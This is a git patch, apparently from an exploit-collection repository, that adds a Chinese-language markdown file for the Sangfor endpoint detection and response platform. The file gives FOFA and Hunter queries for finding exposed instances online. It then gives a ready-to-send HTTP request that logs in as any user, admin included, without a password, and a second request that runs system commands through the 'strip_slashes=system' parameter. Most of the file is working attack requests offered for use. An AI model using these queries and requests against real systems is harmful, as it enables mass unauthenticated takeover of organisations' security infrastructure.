From d4fb61c9730f214ae30c8fd8bd8e52f615c36da0 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 18 Oct 2023 18:47:19 +0800
Subject: [PATCH] =?UTF-8?q?Create=20SANGFOR=E7=BB=88=E7=AB=AF=E6=A3=80?=
 =?UTF-8?q?=E6=B5=8B=E5=93=8D=E5=BA=94=E5=B9=B3=E5=8F=B0=20-=20=E4=BB=BB?=
 =?UTF-8?q?=E6=84=8F=E7=94=A8=E6=88=B7=E5=85=8D=E5=AF=86=E7=99=BB=E5=BD=95?=
 =?UTF-8?q?,=E5=89=8D=E5=8F=B0RCE.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...��检测响应平台 - 任意用户免密登录,前台RCE.md | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE.md

diff --git a/SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE.md b/SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE.md
new file mode 100644
index 0000000..5620fe8
--- /dev/null
+++ b/SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE.md	
@@ -0,0 +1,29 @@
+## SANGFOR终端检测响应平台 - 任意用户免密登录,前台RCE
+
+## FOFA语法
+```
+title="SANGFOR终端检测响应平台"
+icon_hash="1307354852"
+```
+##  鹰图搜索
+```
+web.title="SANGFOR终端检测响应平台"
+web.icon=="68e28d49856759ddeb91b6be3d6f7e42"
+```
+
+## 漏洞复现
+路由后拼接/ui/login.php?user={{需要登录的用户名}}
+
+这边以admin权限用户为例
+```
+GET /ui/login.php?user=admin HTTP/1.1
+
+Host: {{Hostname}}
+```
+
+## 前台RCE
+```
+GET /tool/log/c.php?strip_slashes=system&host=id HTTP/1.1
+
+Host: {{Hostname}}
+```